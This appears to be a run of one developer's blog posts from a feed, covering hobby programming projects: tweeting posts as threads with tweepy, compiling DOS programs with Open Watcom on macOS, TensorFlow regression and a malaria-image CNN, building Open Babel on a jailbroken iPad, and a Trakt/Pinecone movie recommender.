Remember to replace any spaces in the flair with _
E.g. flair:Snail_Mail
limited to r/penpals will only show posts that have the flair Snail Mail
.
I wish this was documented somewhere.
]]>I finally completed my first quick and dirty vaporwave remix of "I Want It That Way" by the Backstreet Boys
Vaporwave is all about A E S T H E T I C S. Vaporwave is a type of music genre that emerged as a parody of Chillwave, shared more as a meme rather than a proper musical genre. Of course this changed as the genre become mature
The first track which is considered to be actual Vaporwave is Ramona Xavier's Macintosh Plus, this set the guidelines for making Vaporwave
There you have your very own Vaporwave track.
( Now, there are some tracks being produced which are not remixes and are original )
The fact that there are steps on producing Vaporwave, this gave me the idea that Vaporwave can actually be made using programming, stay tuned for when I publish the program which I am working on ( Generating A E S T H E T I C artwork and remixes)
]]>Why? Eh, no good reason, but should be fun.
I recently shifted my website to a static site generator I wrote specifically for myself. Thus, it should be easy to just add a feature to check for new posts, split the text into chunks for Twitter threads and tweet them. I am not handling lists or images right now.
First, the dependency: tweepy for tweeting.
pip install tweepy
import os
import tweepy
consumer_key = os.environ["consumer_key"]
consumer_secret = os.environ["consumer_secret"]
access_token = os.environ["access_token"]
access_token_secret = os.environ["access_token_secret"]
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth)
The program need to convert the blog post into text fragments.
It reads the markdown file, removes the top YAML content, checks for headers and splits the content.
tweets = []
first___n = 0
with open(sample_markdown_file) as f:
for line in f.readlines():
if first___n <= 1:
if line == "---\n":
first___n += 1
continue
line = line.strip()
line += " "
if "#" in line:
line = line.replace("#","")
line.strip()
line = "\n" + line
line += "\n\n"
try:
if len(tweets[-1]) < 260 and (len(tweets[-1]) + len(line)) <= 260:
tweets[-1] += line
else:
tweets.append(line)
except IndexError:
if len(line) > 260:
print("ERROR")
else:
tweets.append(line)
Every status update using tweepy has an id attached to it, for the next tweet in the thread, it adds that ID while calling the function.
For every tweet fragment, it also appends 1/n.
for idx, tweet in enumerate(tweets):
tweet += " {}/{}".format(idx+1,len(tweets))
if idx == 0:
a = None
a = api.update_status(tweet)
else:
a = api.update_status(tweet,in_reply_to_status_id=a.id)
print(len(tweet),end=" ")
print("{}/{}\n".format(idx+1,len(tweets)))
Finally, it replies to the last tweet in the thread with the link of the post.
api.update_status("Web Version: {}".format(post_link))
Posting Blog Posts as Twitter Threads Part 1/n
— Navan Chauhan (@navanchauhan) June 24, 2021
Why? Eh, no good reason, but should be fun.
Plan of Action
I recently shifted my website to a static site generator I wrote specifically for myself. 1/5
Web Version: https://t.co/zROU1F5DYv
— Navan Chauhan (@navanchauhan) June 24, 2021
For the next part, I will try to append the code as well. I actually added the code to this post after running the program.
]]>Technically this should work for any platform that OpenWatcom 2 supports compiling binaries for. Some instructions are based on a post at retrocoding.net, and John Tsiombikas's post
You should already have XCode / Command Line Tools, and Homebrew installed. To compile Open Watcom for DOS you will need DOSBox (I use DOSBox-X).
brew install --cask dosbox-x
If this process is super annoying, I might make a custom homebrew tap to build and install Open Watcom
git clone https://github.com/open-watcom/open-watcom-v2
cp open-watcom-v2/setvars.sh custom_setvars.sh
Now, edit this setvars.sh
file. My file looks like this:
#!/bin/zsh
export OWROOT="/Users/navanchauhan/Developer/8088Stuff/open-watcom-v2"
export OWTOOLS=CLANG
export OWDOCBUILD=0
export OWGUINOBUILD=0
export OWDISTRBUILD=0
export OWDOSBOX="/Applications/dosbox-x.app/Contents/MacOS/dosbox-x"
export OWOBJDIR=binbuildV01
. "$OWROOT/cmnvars.sh"
echo "OWROOT=$OWROOT"
cd "$OWROOT"
Note, your OWRTOOT
is definitely going to be in a different location.
source ./custom_setvars.sh
./build.sh
./build.sh rel
This will build, and then copy everything to the rel
directory inside open-watcom-v2
directory. Since I ran this on an Apple Silicon Mac,
all the binaries for me are in the armo64
directory. You can now move everything inside the rel folder to another location, or create a simple
script to init all variables whenever you want.
I like having a script called exportVarsForDOS.sh
#!/bin/zsh
export WATCOM=/Users/navanchauhan/Developer/8088Stuff/open-watcom-v2/rel
export PATH=$PATH:$WATCOM/armo64
export EDDAT=$WATCOM/eddat
# For DOS 8088/8086 development
export INCLUDE=$WATCOM/h
export LIB=$WATCOM/lib286 # You don't really need this
Then, when you need to load up these variables, you can simply run source exportVarsForDOS.sh
or . exportVarsForDOS.sh
Create a new file called example1.c
#include<stdio.h>
int main() {
printf("Hello World!");
return 0;
}
First we compile the code:
$ wcc example1.c
Open Watcom C x86 16-bit Optimizing Compiler
Version 2.0 beta Mar 15 2024 13:11:55
Copyright (c) 2002-2024 The Open Watcom Contributors. All Rights Reserved.
Portions Copyright (c) 1984-2002 Sybase, Inc. All Rights Reserved.
Source code is available under the Sybase Open Watcom Public License.
See https://github.com/open-watcom/open-watcom-v2#readme for details.
example1.c: 7 lines, included 818, 0 warnings, 0 errors
Code size: 19
Then, link to make an executable:
$ wlink name example1.exe system dos file example1.o
Open Watcom Linker Version 2.0 beta Mar 15 2024 13:10:09
Copyright (c) 2002-2024 The Open Watcom Contributors. All Rights Reserved.
Portions Copyright (c) 1985-2002 Sybase, Inc. All Rights Reserved.
Source code is available under the Sybase Open Watcom Public License.
See https://github.com/open-watcom/open-watcom-v2#readme for details.
loading object files
searching libraries
creating a DOS executable
If you want to test this executable, jump to the section titled Testing with DOSBox-X
below.
obj = main.o hello.o
bin = tizts.com
CC = wcc
CFLAGS = -0
LD = wlink
$(bin): $(obj)
$(LD) name $@ system dos file main.o file hello.o
.c.o:
$(CC) $(CFLAGS) $<
clean:
rm $(obj) $(bin)
Where, main.c
void hello(void);
int main(void)
{
hello();
return 0;
}
and hello.c
/* hello.c */
#include <stdio.h>
void hello(void)
{
printf("Hello!");
}
To compile into tizts.com
simply run wmake
$ wmake
➜ simple-cpp wmake
Open Watcom Make Version 2.0 beta Mar 15 2024 13:10:16
Copyright (c) 2002-2024 The Open Watcom Contributors. All Rights Reserved.
Portions Copyright (c) 1988-2002 Sybase, Inc. All Rights Reserved.
Source code is available under the Sybase Open Watcom Public License.
See https://github.com/open-watcom/open-watcom-v2#readme for details.
wcc -0 main.c
Open Watcom C x86 16-bit Optimizing Compiler
Version 2.0 beta Mar 15 2024 13:11:55
Copyright (c) 2002-2024 The Open Watcom Contributors. All Rights Reserved.
Portions Copyright (c) 1984-2002 Sybase, Inc. All Rights Reserved.
Source code is available under the Sybase Open Watcom Public License.
See https://github.com/open-watcom/open-watcom-v2#readme for details.
main.c(8): Warning! W138: No newline at end of file
main.c: 8 lines, included 53, 1 warnings, 0 errors
Code size: 12
wcc -0 hello.c
Open Watcom C x86 16-bit Optimizing Compiler
Version 2.0 beta Mar 15 2024 13:11:55
Copyright (c) 2002-2024 The Open Watcom Contributors. All Rights Reserved.
Portions Copyright (c) 1984-2002 Sybase, Inc. All Rights Reserved.
Source code is available under the Sybase Open Watcom Public License.
See https://github.com/open-watcom/open-watcom-v2#readme for details.
hello.c: 8 lines, included 818, 0 warnings, 0 errors
Code size: 17
wlink name tizts.com system dos file main.o file hello.o
Open Watcom Linker Version 2.0 beta Mar 15 2024 13:10:09
Copyright (c) 2002-2024 The Open Watcom Contributors. All Rights Reserved.
Portions Copyright (c) 1985-2002 Sybase, Inc. All Rights Reserved.
Source code is available under the Sybase Open Watcom Public License.
See https://github.com/open-watcom/open-watcom-v2#readme for details.
loading object files
searching libraries
creating a DOS executable
Create a file called CMakeLists.txt
project(hello)
set(SOURCES abc.c)
add_executable(hello ${SOURCES})
Where, abc.c
is:
#include <stdio.h>
int main() {
printf("Does this work?");
return 0;
}
mkdir build
cd build
And build using CMake
cmake -DCMAKE_SYSTEM_NAME=DOS -DCMAKE_SYSTEM_PROCESSOR=I86 -DCMAKE_C_FLAGS="-0 -bt=dos -d0 -oaxt" -G "Watcom WMake" ../..
There you have it. Three different ways to compile a C program on a macOS device in 2024 that can run on an IBM PC 5150 (which was released in 1981!)
cp example1.exe ~/Downloads
/Applications/dosbox-x.app/Contents/MacOS/dosbox-x
In DOSBox-X we now mount the ~/Downloads
folder as our C:
drive
mount C ~/Downloads
Switch to the C drive
C:
Run the program:
example1
My DOSBox setup might look slightly different than yours...
]]>I have a similar post titled Polynomial Regression Using Tensorflow that used tensorflow.compat.v1
(Which still works as of TF 2.16). But, I thought it would be nicer to redo it with newer TF versions.
I will be skipping all the introductions about polynomial regression and jumping straight to the code. Personally, I prefer using scikit-learn
for this task.
Again, we will be using https://drive.google.com/file/d/1tNL4jxZEfpaP4oflfSn6pIHJX7Pachm9/view (Salary vs Position Dataset)
If you are in a Python Notebook environment like Kaggle or Google Colaboratory, you can simply run:
!wget --no-check-certificate 'https://docs.google.com/uc?export=download&id=1tNL4jxZEfpaP4oflfSn6pIHJX7Pachm9' -O data.csv
If you just want to copy-paste the code, scroll to the bottom for the entire snippet. Here I will try and walk through setting up code for a 3rd-degree (cubic) polynomial
import pandas as pd
import tensorflow as tf
import matplotlib.pyplot as plt
import numpy as np
df = pd.read_csv("data.csv")
Here, we initialize the X and Y values as constants, since they are not going to change. The coefficients are defined as variables.
X = tf.constant(df["Level"], dtype=tf.float32)
Y = tf.constant(df["Salary"], dtype=tf.float32)
coefficients = [tf.Variable(np.random.randn() * 0.01, dtype=tf.float32) for _ in range(4)]
Here, X
and Y
are the values from our dataset. We initialize the coefficients for the equations as small random values.
These coefficients are evaluated by Tensorflow's tf.math.poyval
function which returns the n-th order polynomial based on how many coefficients are passed. Since our list of coefficients contains 4 different variables, it will be evaluated as:
y = (x**3)*coefficients[3] + (x**2)*coefficients[2] + (x**1)*coefficients[1] (x**0)*coefficients[0]
Which is equivalent to the general cubic equation:
optimizer = tf.keras.optimizers.Adam(learning_rate=0.3)
num_epochs = 10_000
for epoch in range(num_epochs):
with tf.GradientTape() as tape:
y_pred = tf.math.polyval(coefficients, X)
loss = tf.reduce_mean(tf.square(y - y_pred))
grads = tape.gradient(loss, coefficients)
optimizer.apply_gradients(zip(grads, coefficients))
if (epoch+1) % 1000 == 0:
print(f"Epoch: {epoch+1}, Loss: {loss.numpy()}"
In TensorFlow 1, we would have been using tf.Session
instead.
Here we are using GradientTape()
instead, to keep track of the loss evaluation and coefficients. This is crucial, as our optimizer needs these gradients to be able to optimize our coefficients.
Our loss function is Mean Squared Error (MSE):
Where is the predicted value and is the actual value
final_coefficients = [c.numpy() for c in coefficients]
print("Final Coefficients:", final_coefficients)
plt.plot(df["Level"], df["Salary"], label="Original Data")
plt.plot(df["Level"],[tf.math.polyval(final_coefficients, tf.constant(x, dtype=tf.float32)).numpy() for x in df["Level"]])
plt.ylabel('Salary')
plt.xlabel('Position')
plt.title("Salary vs Position")
plt.show()
This should work regardless of the Keras backend version (2 or 3)
import tensorflow as tf
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
df = pd.read_csv("data.csv")
############################
## Change Parameters Here ##
############################
x_column = "Level" #
y_column = "Salary" #
degree = 2 #
learning_rate = 0.3 #
num_epochs = 25_000 #
############################
X = tf.constant(df[x_column], dtype=tf.float32)
Y = tf.constant(df[y_column], dtype=tf.float32)
coefficients = [tf.Variable(np.random.randn() * 0.01, dtype=tf.float32) for _ in range(degree + 1)]
optimizer = tf.keras.optimizers.Adam(learning_rate=learning_rate)
for epoch in range(num_epochs):
with tf.GradientTape() as tape:
y_pred = tf.math.polyval(coefficients, X)
loss = tf.reduce_mean(tf.square(Y - y_pred))
grads = tape.gradient(loss, coefficients)
optimizer.apply_gradients(zip(grads, coefficients))
if (epoch+1) % 1000 == 0:
print(f"Epoch: {epoch+1}, Loss: {loss.numpy()}")
final_coefficients = [c.numpy() for c in coefficients]
print("Final Coefficients:", final_coefficients)
print("Final Equation:", end=" ")
for i in range(degree+1):
print(f"{final_coefficients[i]} * x^{degree-i}", end=" + " if i < degree else "\n")
plt.plot(X, Y, label="Original Data")
plt.plot(X,[tf.math.polyval(final_coefficients, tf.constant(x, dtype=tf.float32)).numpy() for x in df[x_column]]), label="Our Poynomial"
plt.ylabel(y_column)
plt.xlabel(x_column)
plt.title(f"{x_column} vs {y_column}")
plt.legend()
plt.show()
This relies on the Optimizer's minimize
function and uses the var_list
parameter to update the variables.
This will not work with Keras 3 backend in TF 2.16.0 and above unless you switch to the legacy backend.
import tensorflow as tf
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
df = pd.read_csv("data.csv")
############################
## Change Parameters Here ##
############################
x_column = "Level" #
y_column = "Salary" #
degree = 2 #
learning_rate = 0.3 #
num_epochs = 25_000 #
############################
X = tf.constant(df[x_column], dtype=tf.float32)
Y = tf.constant(df[y_column], dtype=tf.float32)
coefficients = [tf.Variable(np.random.randn() * 0.01, dtype=tf.float32) for _ in range(degree + 1)]
optimizer = tf.keras.optimizers.Adam(learning_rate=learning_rate)
def loss_function():
pred_y = tf.math.polyval(coefficients, X)
return tf.reduce_mean(tf.square(pred_y - Y))
for epoch in range(num_epochs):
optimizer.minimize(loss_function, var_list=coefficients)
if (epoch+1) % 1000 == 0:
current_loss = loss_function().numpy()
print(f"Epoch {epoch+1}: Training Loss: {current_loss}")
final_coefficients = coefficients.numpy()
print("Final Coefficients:", final_coefficients)
print("Final Equation:", end=" ")
for i in range(degree+1):
print(f"{final_coefficients[i]} * x^{degree-i}", end=" + " if i < degree else "\n")
plt.plot(X, Y, label="Original Data")
plt.plot(X,[tf.math.polyval(final_coefficients, tf.constant(x, dtype=tf.float32)).numpy() for x in df[x_column]], label="Our Polynomial")
plt.ylabel(y_column)
plt.xlabel(x_column)
plt.legend()
plt.title(f"{x_column} vs {y_column}")
plt.show()
As always, remember to tweak the parameters and choose the correct model for the job. A polynomial regression model might not even be the best model for this particular dataset.
How would you modify this code to use another type of nonlinear regression? Say,
Hint: Your loss calculation would be similar to:
bx = tf.pow(coefficients[1], X)
pred_y = tf.math.multiply(coefficients[0], bx)
loss = tf.reduce_mean(tf.square(pred_y - Y))
Why a Hello World post?
Just re-did the entire website using Publish (Publish by John Sundell). So, a new hello world post :)
]]>https://s3-us-west-2.amazonaws.com/s.cdpn.io/148866/img-original.jpg
]]>In order to be able to access Kaggle Datasets, you will need to have an account on Kaggle (which is Free)
Copy the File to the root folder of your Google Drive
import os
from google.colab import drive
drive.mount('/content/drive')
After this click on the URL in the output section, login and then paste the Auth Code
os.environ['KAGGLE_CONFIG_DIR'] = "/content/drive/My Drive/"
Voila! You can now download Kaggle datasets
]]>Done during Google Code-In. Org: Tensorflow.
%tensorflow_version 2.x #This is for telling Colab that you want to use TF 2.0, ignore if running on local machine
from PIL import Image # We use the PIL Library to resize images
import numpy as np
import os
import cv2
import tensorflow as tf
from tensorflow.keras import datasets, layers, models
import pandas as pd
import matplotlib.pyplot as plt
from keras.models import Sequential
from keras.layers import Conv2D,MaxPooling2D,Dense,Flatten,Dropout
!wget ftp://lhcftp.nlm.nih.gov/Open-Access-Datasets/Malaria/cell_images.zip
!unzip cell_images.zip
We resize all the images as 50x50 and add the numpy array of that image as well as their label names (Infected or Not) to common arrays.
data = []
labels = []
Parasitized = os.listdir("./cell_images/Parasitized/")
for parasite in Parasitized:
try:
image=cv2.imread("./cell_images/Parasitized/"+parasite)
image_from_array = Image.fromarray(image, 'RGB')
size_image = image_from_array.resize((50, 50))
data.append(np.array(size_image))
labels.append(0)
except AttributeError:
print("")
Uninfected = os.listdir("./cell_images/Uninfected/")
for uninfect in Uninfected:
try:
image=cv2.imread("./cell_images/Uninfected/"+uninfect)
image_from_array = Image.fromarray(image, 'RGB')
size_image = image_from_array.resize((50, 50))
data.append(np.array(size_image))
labels.append(1)
except AttributeError:
print("")
df = np.array(data)
labels = np.array(labels)
(X_train, X_test) = df[(int)(0.1*len(df)):],df[:(int)(0.1*len(df))]
(y_train, y_test) = labels[(int)(0.1*len(labels)):],labels[:(int)(0.1*len(labels))]
s=np.arange(X_train.shape[0])
np.random.shuffle(s)
X_train=X_train[s]
y_train=y_train[s]
X_train = X_train/255.0
By creating a sequential model, we create a linear stack of layers.
Note: The input shape for the first layer is 50,50 which corresponds with the sizes of the resized images
model = models.Sequential()
model.add(layers.Conv2D(filters=16, kernel_size=2, padding='same', activation='relu', input_shape=(50,50,3)))
model.add(layers.MaxPooling2D(pool_size=2))
model.add(layers.Conv2D(filters=32,kernel_size=2,padding='same',activation='relu'))
model.add(layers.MaxPooling2D(pool_size=2))
model.add(layers.Conv2D(filters=64,kernel_size=2,padding="same",activation="relu"))
model.add(layers.MaxPooling2D(pool_size=2))
model.add(layers.Dropout(0.2))
model.add(layers.Flatten())
model.add(layers.Dense(500,activation="relu"))
model.add(layers.Dropout(0.2))
model.add(layers.Dense(2,activation="softmax"))#2 represent output layer neurons
model.summary()
We use the Adam optimiser as it is an adaptive learning rate optimisation algorithm that's been designed specifically for training deep neural networks, which means it changes its learning rate automatically to get the best results
model.compile(optimizer="adam",
loss="sparse_categorical_crossentropy",
metrics=["accuracy"])
We train the model for 10 epochs on the training data and then validate it using the testing data
history = model.fit(X_train,y_train, epochs=10, validation_data=(X_test,y_test))
Train on 24803 samples, validate on 2755 samples
Epoch 1/10
24803/24803 [==============================] - 57s 2ms/sample - loss: 0.0786 - accuracy: 0.9729 - val_loss: 0.0000e+00 - val_accuracy: 1.0000
Epoch 2/10
24803/24803 [==============================] - 58s 2ms/sample - loss: 0.0746 - accuracy: 0.9731 - val_loss: 0.0290 - val_accuracy: 0.9996
Epoch 3/10
24803/24803 [==============================] - 58s 2ms/sample - loss: 0.0672 - accuracy: 0.9764 - val_loss: 0.0000e+00 - val_accuracy: 1.0000
Epoch 4/10
24803/24803 [==============================] - 58s 2ms/sample - loss: 0.0601 - accuracy: 0.9789 - val_loss: 0.0000e+00 - val_accuracy: 1.0000
Epoch 5/10
24803/24803 [==============================] - 58s 2ms/sample - loss: 0.0558 - accuracy: 0.9804 - val_loss: 0.0000e+00 - val_accuracy: 1.0000
Epoch 6/10
24803/24803 [==============================] - 57s 2ms/sample - loss: 0.0513 - accuracy: 0.9819 - val_loss: 0.0000e+00 - val_accuracy: 1.0000
Epoch 7/10
24803/24803 [==============================] - 58s 2ms/sample - loss: 0.0452 - accuracy: 0.9849 - val_loss: 0.3190 - val_accuracy: 0.9985
Epoch 8/10
24803/24803 [==============================] - 58s 2ms/sample - loss: 0.0404 - accuracy: 0.9858 - val_loss: 0.0000e+00 - val_accuracy: 1.0000
Epoch 9/10
24803/24803 [==============================] - 58s 2ms/sample - loss: 0.0352 - accuracy: 0.9878 - val_loss: 0.0000e+00 - val_accuracy: 1.0000
Epoch 10/10
24803/24803 [==============================] - 58s 2ms/sample - loss: 0.0373 - accuracy: 0.9865 - val_loss: 0.0000e+00 - val_accuracy: 1.0000
accuracy = history.history['accuracy'][-1]*100
loss = history.history['loss'][-1]*100
val_accuracy = history.history['val_accuracy'][-1]*100
val_loss = history.history['val_loss'][-1]*100
print(
'Accuracy:', accuracy,
'\nLoss:', loss,
'\nValidation Accuracy:', val_accuracy,
'\nValidation Loss:', val_loss
)
Accuracy: 98.64532351493835
Loss: 3.732407123270176
Validation Accuracy: 100.0
Validation Loss: 0.0
We have achieved 98% Accuracy!
]]>Due to the fact that my summer vacations started today, I had the brilliant idea of trying to run open babel on my iPad. To give a little background, I had tried to compile AutoDock Vina using a cross-compiler but I had miserably failed.
I am running the Checkr1n jailbreak on my iPad and the Unc0ver jailbreak on my phone.
Well, just because I can. This is literally the only reason I tried compiling it and also partially because in the long run I want to compile AutoDock Vina so I can do Molecular Docking on the go.
How hard can it be to compile open babel right? It is just a simple software with clear and concise build instructions. I just need to use cmake
to build and the make
to install.
It is 11 AM in the morning. I install clang, cmake and make
from the Sam Bingner's repository, fired up ssh, downloaded the source code and ran the build command.`clang
I couldn't even get cmake to run, I did a little digging around StackOverflow and founf that I needed the iOS SDK, sure no problem. I waited for Xcode to update and transferred the SDKs to my iPad
scp -r /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS.sdk root@192.168.1.8:/var/sdks/
Them I told cmake that this is the location for my SDK 😠. Successful! Now I just needed to use make.
It was giving the error that thread-local-storage was not supported on this device.
[ 0%] Building CXX object src/CMakeFiles/openbabel.dir/alias.cpp.o
[ 1%] Building CXX object src/CMakeFiles/openbabel.dir/atom.cpp.o
In file included from /var/root/obabel/ob-src/src/atom.cpp:28:
In file included from /var/root/obabel/ob-src/include/openbabel/ring.h:29:
/var/root/obabel/ob-src/include/openbabel/typer.h:70:1: error: thread-local storage is not supported for the current target
THREAD_LOCAL OB_EXTERN OBAtomTyper atomtyper;
^
/var/root/obabel/ob-src/include/openbabel/mol.h:35:24: note: expanded from macro 'THREAD_LOCAL'
# define THREAD_LOCAL thread_local
^
In file included from /var/root/obabel/ob-src/src/atom.cpp:28:
In file included from /var/root/obabel/ob-src/include/openbabel/ring.h:29:
/var/root/obabel/ob-src/include/openbabel/typer.h:84:1: error: thread-local storage is not supported for the current target
THREAD_LOCAL OB_EXTERN OBAromaticTyper aromtyper;
^
/var/root/obabel/ob-src/include/openbabel/mol.h:35:24: note: expanded from macro 'THREAD_LOCAL'
# define THREAD_LOCAL thread_local
^
/var/root/obabel/ob-src/src/atom.cpp:107:10: error: thread-local storage is not supported for the current target
extern THREAD_LOCAL OBAromaticTyper aromtyper;
^
/var/root/obabel/ob-src/include/openbabel/mol.h:35:24: note: expanded from macro 'THREAD_LOCAL'
# define THREAD_LOCAL thread_local
^
/var/root/obabel/ob-src/src/atom.cpp:108:10: error: thread-local storage is not supported for the current target
extern THREAD_LOCAL OBAtomTyper atomtyper;
^
/var/root/obabel/ob-src/include/openbabel/mol.h:35:24: note: expanded from macro 'THREAD_LOCAL'
# define THREAD_LOCAL thread_local
^
/var/root/obabel/ob-src/src/atom.cpp:109:10: error: thread-local storage is not supported for the current target
extern THREAD_LOCAL OBPhModel phmodel;
^
/var/root/obabel/ob-src/include/openbabel/mol.h:35:24: note: expanded from macro 'THREAD_LOCAL'
# define THREAD_LOCAL thread_local
^
5 errors generated.
make[2]: *** [src/CMakeFiles/openbabel.dir/build.make:76: src/CMakeFiles/openbabel.dir/atom.cpp.o] Error 1
make[1]: *** [CMakeFiles/Makefile2:1085: src/CMakeFiles/openbabel.dir/all] Error 2
make: *** [Makefile:129: all] Error 2
Strange but it is alright, there is nothing that hasn't been answered on the internet.
I did a little digging around and could not find a solution 😔
As a temporary fix, I disabled multithreading by going and commenting the lines in the source code.
This was pretty straight forward, I tried installing it on my iPad and it was working pretty smoothly.
So I airdropped the .deb to my phone and tried installing it, the installation was successful but when I tried obabel
it just aborted.
Turns out because I had created an install target of a separate folder while compiling, the binaries were referencing a non-existing dylib rather than those in the /usr/lib folder. As a quick workaround I transferred the deb folder to my laptop and used otool and install_name tool: install_name_tool -change /var/root/obabel/ob-build/lib/libopenbabel.7.dylib /usr/lib/libopenbabel.7.dylib
for all the executables and then signed them using jtool
I then installed it and everything went smoothly, I even ran obabel
and it executed perfectly, showing the version number 3.1.0 ✌️ Ahh, smooth victory.
Nope. When I tried converting from SMILES to pdbqt, it gave an error saying plugin not found. This was weird.
So I just copied the entire build folder from my iPad to my phone and tried running it. Oops, Apple Sandbox Error, Oh no!
I spent 2 hours around this problem, only to see the documentation and realise I hadn't setup the environment variable 🤦♂️
export BABEL_DATADIR="/usr/share/openbabel/3.1.0"
export BABEL_LIBDIR="/usr/lib/openbabel/3.1.0"
This was the tragedy of trying to compile something without knowing enough about compiling. It is 11:30 as of writing this. Something as trivial as this should not have taken me so long. Am I going to try to compile AutoDock Vina next? 🤔 Maybe.
Also, if you want to try Open Babel on you jailbroken iDevice, install the package from my repository ( You, need to run the above mentioned final fix :p ). This was tested on iOS 13.5, I cannot tell if it will work on others or not.
Hopefully, I add some more screenshots to this post.
Edit 1: Added Screenshots, had to replicate the errors.
]]>I recently came across a movie/tv-show recommender, couchmoney.tv. I loved it. I decided that I wanted to build something similar, so I could tinker with it as much as I wanted.
I also wanted a recommendation system I could use via a REST API. Although I have not included that part in this post, I did eventually create it.
By measuring the cosine of the angle between two vectors, you can get a value in the range [0,1] with 0 meaning no similarity. Now, if we find a way to represent information about movies as a vector, we can use cosine similarity as a metric to find similar movies.
As we are recommending just based on the content of the movies, this is called a content based recommendation system.
Trakt exposes a nice API to search for movies/tv-shows. To access the API, you first need to get an API key (the Trakt ID you get when you create a new application).
I decided to use SQL-Alchemy with a SQLite backend just to make my life easier if I decided on switching to Postgres anytime I felt like.
First, I needed to check the total number of records in Trakt’s database.
import requests
import os
trakt_id = os.getenv("TRAKT_ID")
api_base = "https://api.trakt.tv"
headers = {
"Content-Type": "application/json",
"trakt-api-version": "2",
"trakt-api-key": trakt_id
}
params = {
"query": "",
"years": "1900-2021",
"page": "1",
"extended": "full",
"languages": "en"
}
res = requests.get(f"{api_base}/search/movie",headers=headers,params=params)
total_items = res.headers["x-pagination-item-count"]
print(f"There are {total_items} movies")
There are 333946 movies
First, I needed to declare the database schema in (database.py
):
import sqlalchemy
from sqlalchemy import create_engine
from sqlalchemy import Table, Column, Integer, String, MetaData, ForeignKey, PickleType
from sqlalchemy import insert
from sqlalchemy.orm import sessionmaker
from sqlalchemy.exc import IntegrityError
meta = MetaData()
movies_table = Table(
"movies",
meta,
Column("trakt_id", Integer, primary_key=True, autoincrement=False),
Column("title", String),
Column("overview", String),
Column("genres", String),
Column("year", Integer),
Column("released", String),
Column("runtime", Integer),
Column("country", String),
Column("language", String),
Column("rating", Integer),
Column("votes", Integer),
Column("comment_count", Integer),
Column("tagline", String),
Column("embeddings", PickleType)
)
# Helper function to connect to the db
def init_db_stuff(database_url: str):
engine = create_engine(database_url)
meta.create_all(engine)
Session = sessionmaker(bind=engine)
return engine, Session
In the end, I could have dropped the embeddings field from the table schema as I never got around to using it.
from database import *
from tqdm import tqdm
import requests
import os
trakt_id = os.getenv("TRAKT_ID")
max_requests = 5000 # How many requests I wanted to wrap everything up in
req_count = 0 # A counter for how many requests I have made
years = "1900-2021"
page = 1 # The initial page number for the search
extended = "full" # Required to get additional information
limit = "10" # No of entires per request -- This will be automatically picked based on max_requests
languages = "en" # Limit to English
api_base = "https://api.trakt.tv"
database_url = "sqlite:///jlm.db"
headers = {
"Content-Type": "application/json",
"trakt-api-version": "2",
"trakt-api-key": trakt_id
}
params = {
"query": "",
"years": years,
"page": page,
"extended": extended,
"limit": limit,
"languages": languages
}
# Helper function to get desirable values from the response
def create_movie_dict(movie: dict):
m = movie["movie"]
movie_dict = {
"title": m["title"],
"overview": m["overview"],
"genres": m["genres"],
"language": m["language"],
"year": int(m["year"]),
"trakt_id": m["ids"]["trakt"],
"released": m["released"],
"runtime": int(m["runtime"]),
"country": m["country"],
"rating": int(m["rating"]),
"votes": int(m["votes"]),
"comment_count": int(m["comment_count"]),
"tagline": m["tagline"]
}
return movie_dict
# Get total number of items
params["limit"] = 1
res = requests.get(f"{api_base}/search/movie",headers=headers,params=params)
total_items = res.headers["x-pagination-item-count"]
engine, Session = init_db_stuff(database_url)
for page in tqdm(range(1,max_requests+1)):
params["page"] = page
params["limit"] = int(int(total_items)/max_requests)
movies = []
res = requests.get(f"{api_base}/search/movie",headers=headers,params=params)
if res.status_code == 500:
break
elif res.status_code == 200:
None
else:
print(f"OwO Code {res.status_code}")
for movie in res.json():
movies.append(create_movie_dict(movie))
with engine.connect() as conn:
for movie in movies:
with conn.begin() as trans:
stmt = insert(movies_table).values(
trakt_id=movie["trakt_id"], title=movie["title"], genres=" ".join(movie["genres"]),
language=movie["language"], year=movie["year"], released=movie["released"],
runtime=movie["runtime"], country=movie["country"], overview=movie["overview"],
rating=movie["rating"], votes=movie["votes"], comment_count=movie["comment_count"],
tagline=movie["tagline"])
try:
result = conn.execute(stmt)
trans.commit()
except IntegrityError:
trans.rollback()
req_count += 1
(Note: I was well within the rate-limit so I did not have to slow down or implement any other measures)
Running this script took me approximately 3 hours, and resulted in an SQLite database of 141.5 MB
I did not want to put my poor Mac through the estimated 23 hours it would have taken to embed the sentences. I decided to use Google Colab instead.
Because of the small size of the database file, I was able to just upload the file.
For the encoding model, I decided to use the pretrained paraphrase-multilingual-MiniLM-L12-v2
model for SentenceTransformers, a Python framework for SOTA sentence, text and image embeddings.
I wanted to use a multilingual model as I personally consume content in various languages and some of the sources for their information do not translate to English.
As of writing this post, I did not include any other database except Trakt.
While deciding how I was going to process the embeddings, I came across multiple solutions:
Milvus - An open-source vector database with similar search functionality
FAISS - A library for efficient similarity search
Pinecone - A fully managed vector database with similar search functionality
I did not want to waste time setting up the first two, so I decided to go with Pinecone which offers 1M 768-dim vectors for free with no credit card required (Our embeddings are 384-dim dense).
Getting started with Pinecone was as easy as:
Signing up
Specifying the index name and vector dimensions along with the similarity search metric (Cosine Similarity for our use case)
Getting the API key
Installing the Python module (pinecone-client)
import pandas as pd
import pinecone
from sentence_transformers import SentenceTransformer
from tqdm import tqdm
database_url = "sqlite:///jlm.db"
PINECONE_KEY = "not-this-at-all"
batch_size = 32
pinecone.init(api_key=PINECONE_KEY, environment="us-west1-gcp")
index = pinecone.Index("movies")
model = SentenceTransformer("paraphrase-multilingual-MiniLM-L12-v2", device="cuda")
engine, Session = init_db_stuff(database_url)
df = pd.read_sql("Select * from movies", engine)
df["combined_text"] = df["title"] + ": " + df["overview"].fillna('') + " - " + df["tagline"].fillna('') + " Genres:- " + df["genres"].fillna('')
# Creating the embedding and inserting it into the database
for x in tqdm(range(0,len(df),batch_size)):
to_send = []
trakt_ids = df["trakt_id"][x:x+batch_size].tolist()
sentences = df["combined_text"][x:x+batch_size].tolist()
embeddings = model.encode(sentences)
for idx, value in enumerate(trakt_ids):
to_send.append(
(
str(value), embeddings[idx].tolist()
))
index.upsert(to_send)
That's it!
We use the trakt_id
for the movie as the ID for the vectors and upsert it into the index.
